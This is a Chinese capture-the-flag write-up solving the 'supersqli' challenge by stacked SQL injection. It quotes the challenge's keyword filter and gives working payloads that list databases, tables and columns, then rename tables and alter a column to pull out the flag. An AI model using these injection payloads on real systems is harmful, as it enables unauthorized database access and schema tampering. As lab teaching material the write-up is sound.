堆叠注入

supersqli

[环境]

windows

[工具]

Firefox

[步骤]

先添加一个单引号,报错,错误信息如下:

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

接着测试--+注释,发现被过滤,然后使用#注释,可行 用order by语句判断出有两个字段,接着使用union select 爆字段,发现这个时候出现了如下提示:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现上面的关键字都被过滤不能使用了,没法进行注入,这个时候尝试一下堆叠注入

现在回到这道题,利用堆叠注入,查询所有数据库:

1';show databases;#

查询所有表:

1';show tables;#

查询words表中所有列:

1';show columns from words;#

查询1919810931114514表中所有列

1';show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id

这道题没有禁用rename和alert,所以我们可以采用修改表结构的方法来得到flag 将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

这段代码的意思是将words表名改为words1,1919810931114514表名改为words,将现在的words表中的flag列名改为id 然后用1' or 1=1 #得到flag

(0)

相关推荐

  • 【数据库】【sqlite】sqlite多表关联update 列值修改

    sqlite多表关联update 列值修改 sqlite数据库的update多表关联更新语句,和其他数据库有点小不一样 在sql server中: 用table1的 id 和 table2的 pid, ...

  • MySQL的执行计划和索引详解

    使用explain关键字可以模拟优化器执行sql语句,从而知道mysql是如何处理sql语句的,分析你的查询语句或者是结构性能. 我们通过几张表来使用explain的例子: 在select语句之前增加 ...

  • 索引介绍

    一.索引介绍 1.什么是索引 1)索引就好比一本书的目录,它能让你更快的找到自己想要的内容. 2)让获取的数据更有目的性,从而提高数据库检索数据的性能. 2.索引类型介绍 1)BTREE:B+树索引 ...

  • mysql update语句根据子查询结果把子查询数据写入修改字段

    需求,应用场景 table1是统计信息表,里面存储了商店id,一个商店一条数据,table2是订单表,里面存储了多个订单,每条订单有一个字段是table1的商店id,table3是商品表,存储了多个商 ...

  • SQL必知必会实践--mysql

    -- mysql安装 --   https://www.mysql.com/downloads/   终端执行命令   (可参考本笔记MySQL环境搭建-mysql 8.0.13 解压版安装配置方法图 ...

  • 普丽盛:注入资产业绩承诺更像画饼

    最新价:45.6 市盈率:334.11 总市值:45.6亿 普丽盛:注入资产业绩承诺更像画饼 2021年05月08日 09:09   作者:启凡   来源: 证券市场周刊 4月21日晚间,普丽盛(30 ...

  • 直播,为在线教育行业注入新的活力!

    直播的崛起,给众多行业注入新的活力,其中就包括了在线教育机构. 不过目前各地区的教育资源分配不均,而直播可以解决这个问题,让更多优质的师资通过线上入驻到不同地区,无论是哪里的学生都可以享受到名师教学. ...

  • 消博会快报 | 复星国际董事长郭广昌:为海南自贸港建设注入“复星动力”

    郭广昌. 受访者供图 "复星积极参与首届消博会,不仅源于复星对海南的一份情结与承诺,更是源于复星所提出的'创新驱动的家庭消费产业集团'的定位.同时,复星今年提出'C端置顶'战略,希望借助消博 ...

  • 往蚂蚁巢穴中注入10吨水泥,挖开后看见奇观

    对于大多数的中国人来说,一辈子累死累活到头来能混上一套100平米左右的房子,就可以高呼社会主义万岁了.别的不比就说跟蚂蚁的巢穴比起来也着实有些寒酸. 说起蚂蚁这种微小的生物大家再熟悉不过了,虽然说单个 ...

  • Guru Capital向外汇经纪商ETX Capital注入230万美元额外资本

    在完成对零售外汇和差价合约经纪人ETX Capital的收购后,瑞士私募股权公司Guru Capital向ETX的运营公司Monecor(London)Limited注入164万英镑(约230万美元) ...

  • 全新概念为海东旅游注入强心剂

    近日召开的海东市第一次旅游发展大会提出:举全市之力,将"大美青海·风情海东"和"极地门户·青藏首站"形象全面推向全国.推向世界. "大美青海·风情海东 ...

  • DVWA通关之命令注入(command injection)

    难度等级:low 过关思路 我们先将其难度设置为low,看到其界面如下: 通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1和www.baidu.com测试如下 ...

  • 从今天起,给你注入可应用于「业务增长」的数据驱动力

    历史上的今天: 1944年-盟军在法国诺曼底登陆: 1966年-无人宇宙飞船拍下月球表面照片. 这一天曾发生过很多有转折且具有划时代意义的重大事件,同样在2017年6月6日,在互联网时代多元化商业模式 ...

  • 转型在即,大数据对城商行数字化赛道注入新动能

    2020年初爆发的一场疫情,将中小城商行在金融科技领域的不足进一步暴露出来,同时也促使中小城商行从业者对自身的数字化转型有了更多更深入的思考.银行业数据资源丰富,但是大部分中小城市商业银行的数据积累. ...